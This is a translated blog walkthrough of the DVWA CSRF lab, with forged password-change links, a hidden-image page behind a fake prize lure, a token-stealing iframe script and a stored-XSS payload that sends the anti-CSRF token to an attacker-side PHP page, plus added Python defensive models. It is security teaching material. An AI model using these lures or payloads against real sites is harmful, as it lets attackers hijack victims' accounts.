[DVWA (g)] CSRF


CSRF (Cross Site Request Forgery)

Preface:

CSRF abuses the user's cookie to forge requests that do things harmful to the user. The essential point of CSRF is that the victim's own cookie is used to send a forged request to the server.


low:

1. Observation:

Enter the new password and the confirmation password, then click Change. The page reports that the password was changed; with HackBar's "Load URL" you can inspect the request.

The URL that performs the change is visible directly in the request.

2. construct URL:

http://127.0.0.1/dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#

When the victim clicks this link, the browser sends it with the victim's existing cookie, so the forged password-change request is accepted and the password becomes "password".

3. Hide short link:

But there are many problems: such a crude link arouses the victim's suspicion, so some means of disguise is needed.
Obviously the link is a problem in itself: the password is written in the clear! No one would dare click it, so use a webmaster tool to convert it into a short link.

4. Show hidden:

Now the victim may click, but after clicking they land on the change-password page, which also displays "password changed successfully". This arouses suspicion, so go one step further: make the victim click willingly and not notice that the password has been changed.
Structure of the HTML files on the attacker's server (here the www folder):

click.html:

<!DOCTYPE html>
<html>
<head>
    <title>lottery</title>
</head>
<body>
    <p>
        <a href="change_password.html">Click the link to claim a one-million prize!</a>
    </p>
</body>
</html>

Effect:

change_password.html:

<!DOCTYPE html>
<html>
<head>
    <title>winning friends</title>
</head>
<body>
    <img src="http://127.0.0.1/dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#" style="display:none;" />
    <h1>Congratulations, you have won</h1>
    <h2>Change Password Award</h2>
</body>
</html>

Effect:

At this point the password has already been changed!

Of course, this is just a simple page thrown together, but an ordinary user would see nothing wrong and would not even know what had happened. In practice the attack can be disguised as a link from a site closely associated with the target site, achieving the goal of a malicious modification.


medium:

1. Edit the URL directly in HackBar:

The change is not accepted, and the page shows an error prompt.
The HTTP_REFERER is the issue.

2. Check the php source code:

We find that the code includes a check on where the request came from:

    // Checks to see where the request came from
    if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false )

So the Referer only has to contain the host name, here 127.0.0.1. Rename change_password.html to 127.0.0.1.html and the check is satisfied.
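To make the weakness of that check concrete from the defender's side, here is an added Python model (not DVWA's own code) that reproduces the substring comparison above and contrasts it with a check that parses the Referer and compares its host component exactly. The sample Referer values are constructed for the page's scenario (DVWA at 127.0.0.1, attacker page at 10.4.253.2); the function names are mine.

```python
from urllib.parse import urlparse

def referer_check_substring(referer, server_name):
    """Model of the medium-level check:
    stripos($_SERVER['HTTP_REFERER'], $_SERVER['SERVER_NAME']) !== false
    Passes whenever the server name appears anywhere in the Referer string."""
    if not referer:
        return False
    return server_name.lower() in referer.lower()

def referer_check_strict(referer, server_name):
    """Hardened variant: parse the Referer and compare only its host component.
    A missing, unparseable or non-HTTP Referer is rejected (fail closed)."""
    if not referer:
        return False
    try:
        parsed = urlparse(referer)
    except ValueError:
        return False
    if parsed.scheme not in ("http", "https") or parsed.hostname is None:
        return False
    return parsed.hostname.lower() == server_name.lower()

# Constructed sample Referer headers and whether each is a legitimate origin.
SAMPLES = [
    ("http://127.0.0.1/dvwa/vulnerabilities/csrf/", True),   # the real form page
    ("http://10.4.253.2/127.0.0.1.html", False),              # server name only in the path
    ("http://127.0.0.1.attacker.example/", False),           # server name as a subdomain prefix
    ("", False),                                             # no Referer header at all
]

def evaluate(server_name="127.0.0.1"):
    """Run both checks over the samples; returns one dict per sample."""
    rows = []
    for referer, legitimate in SAMPLES:
        rows.append({
            "referer": referer,
            "legitimate": legitimate,
            "substring_check": referer_check_substring(referer, server_name),
            "strict_check": referer_check_strict(referer, server_name),
        })
    return rows

if __name__ == "__main__":
    for row in evaluate():
        print(row)
```

The strict check agrees with the "legitimate" column for every sample, while the substring check accepts the path-based and subdomain-based forgeries. Even the strict form is only a secondary defence: browsers may omit the Referer, so an anti-CSRF token (the high level's approach) remains the primary control.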


high:

1. Try:

Continuing with the previous method, we find it no longer works.

Trying once more and inspecting the request, we find an extra parameter, a token, and after repeated tests it changes every time:

2. Check the php source code:

We find that the anti-CSRF measure is a token check:

    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); 

So if we can simply obtain the token, the problem is solved.

3. Attack script:

Obtain the token and automatically change the password.

<!DOCTYPE html>
<html>
<head>
    <title></title>
</head>
<body>
    <iframe src="http://127.0.0.1/dvwa/vulnerabilities/csrf" id="hack" border="0" style="display:none;"></iframe>
    <form method="GET" id="transfer" action="http://127.0.0.1/dvwa/vulnerabilities/csrf">
        <input type="hidden" name="password_new" value="password">
        <input type="hidden" name="password_conf" value="password">
        <input type="hidden" name="user_token" value="">
        <input type="hidden" name="Change" value="Change">
    </form>
    <script type="text/javascript">
        function attack()
        {
            document.getElementsByName('user_token')[0].value=document.getElementById("hack").contentWindow.document.getElementsByName('user_token')[0].value;
            document.getElementById("transfer").submit();
        }
    </script>
    <h1>Congratulations, you have won</h1>
    <h2>Change Password Award</h2>
</body>
</html>

The page runs, but after logging out of DVWA and logging back in, it turns out the password was not modified.

4. Find the reason:

It is a cross-origin issue: the attack page is at 10.4.253.2 while DVWA is at 127.0.0.1, so the script cannot read the token out of the iframe. If instead the token could be sent from our own origin, 127.0.0.1, it would work; recalling the earlier XSS attack, the high level can be exploited! So now use the stored XSS vulnerability and store the attack code on the server. The details are not repeated here; if anything is unclear, see the earlier essay on stored XSS, the high-level section.

5. First construct a payload to see whether this is feasible:

name:<iframe src="../csrf" onload=alert(frames[0].document.getElementsByName('user_token')[0].value)>

message: change password

A random token pops up, so it is feasible.

6. Use the token:

Here I tried frantically: because of the database field length limit, which cannot be changed from the front-end HTML, a long payload is not feasible. Troublesome!
The current idea, although the database payload length limit still applies:
Build a PHP file that handles the token passed in.
get_dvwa_token.php:

Return to the stored XSS page, modify the name field's length limit, and construct the payload:
name: <iframe src="../csrf" onload="document.location='http://127.0.0.1/get_dvwa_token.php?user_token='+frames[0].document.getElementsByName('user_token')[0].value">
message: change password

There is a pitfall here that I have not yet mastered; persistence and the like will be discussed later.
In any case, once the token has been obtained it can be used! Although this step was not resolved, the final disguise method is: click the link, jump to the stored XSS page that performs the attack, and finish with a cover-up display.


impossible:

PDO is used as the defence against SQL injection;

As CSRF protection, the user is required to enter the old password (which could only be obtained by brute force);

So without knowing the original password, a CSRF attack is not possible in any case.
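To show what the high-level token check and the impossible-level old-password requirement amount to in code, here is an added Python model written for this page, not DVWA's own checkToken() implementation. It assumes a per-session token stored server-side, compared in constant time and rotated after every use (matching the observation above that the token changes each time), plus verification of the current password with a salted PBKDF2 hash before any change. The class and method names, the sample password "hunter2" and the result strings are all constructed for the example.

```python
import hashlib
import hmac
import secrets

class PasswordChangeService:
    """Toy model of DVWA's high/impossible-level defences (not DVWA code)."""

    def __init__(self, current_password):
        self._salt = secrets.token_bytes(16)
        self._pw_hash = self._hash(current_password)
        self.sessions = {}  # session id -> current anti-CSRF token

    def _hash(self, password):
        return hashlib.pbkdf2_hmac("sha256", password.encode(), self._salt, 50_000)

    def new_session(self):
        """Start a logged-in session and issue its first anti-CSRF token."""
        sid = secrets.token_hex(16)
        self.sessions[sid] = secrets.token_hex(32)
        return sid

    def render_form(self, sid):
        """The value the server would embed in the form's hidden user_token field."""
        return self.sessions[sid]

    def change_password(self, sid, user_token, password_current, password_new, password_conf):
        """Server-side handler for the change request; returns a result string."""
        token = self.sessions.get(sid)
        if token is None:
            return "no session"
        # Token check first: a forged request without the session's token goes no further.
        if user_token is None or not hmac.compare_digest(token, user_token):
            return "token mismatch"
        # Rotate immediately so a harvested token cannot be replayed.
        self.sessions[sid] = secrets.token_hex(32)
        # Impossible level: the current password must be known (cookie alone is not enough).
        if not hmac.compare_digest(self._hash(password_current), self._pw_hash):
            return "current password incorrect"
        if password_new != password_conf:
            return "passwords do not match"
        self._pw_hash = self._hash(password_new)
        return "password changed"

    def verify(self, password):
        """Check a password against the stored hash (used for login)."""
        return hmac.compare_digest(self._hash(password), self._pw_hash)

def demo():
    """Replay the page's scenarios against the model; returns the four outcomes."""
    svc = PasswordChangeService("hunter2")
    sid = svc.new_session()
    # Low-level style link: cookie present, but no token.
    r_no_token = svc.change_password(sid, None, "", "password", "password")
    # High-level style: token harvested, but the current password is unknown.
    r_no_password = svc.change_password(sid, svc.render_form(sid), "guess", "password", "password")
    # Legitimate user: fresh token and correct current password.
    r_legit = svc.change_password(sid, svc.render_form(sid), "hunter2", "newpass", "newpass")
    return r_no_token, r_no_password, r_legit, svc.verify("newpass")

if __name__ == "__main__":
    print(demo())
```

Two points the model makes explicit: a token that is rotated after each use cannot be replayed even if it leaks once, and requiring the current password means a forged request succeeds only when the attacker already knows the secret the change is meant to protect.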


Postscript

Thinking about related security questions:

1) If you find a CSRF vulnerability, how would you exploit it?

The first key point: trick the user into clicking; once the user clicks, there is an opportunity.

The second key point: impersonation, taking advantage of the fact that the user is logged in, to carry out sabotage or information gathering in the user's name.

2) What is the connection between CSRF and XSS?

CSRF attacks often make use of XSS.


Source: www.cnblogs.com/wayne-tao/p/11094012.html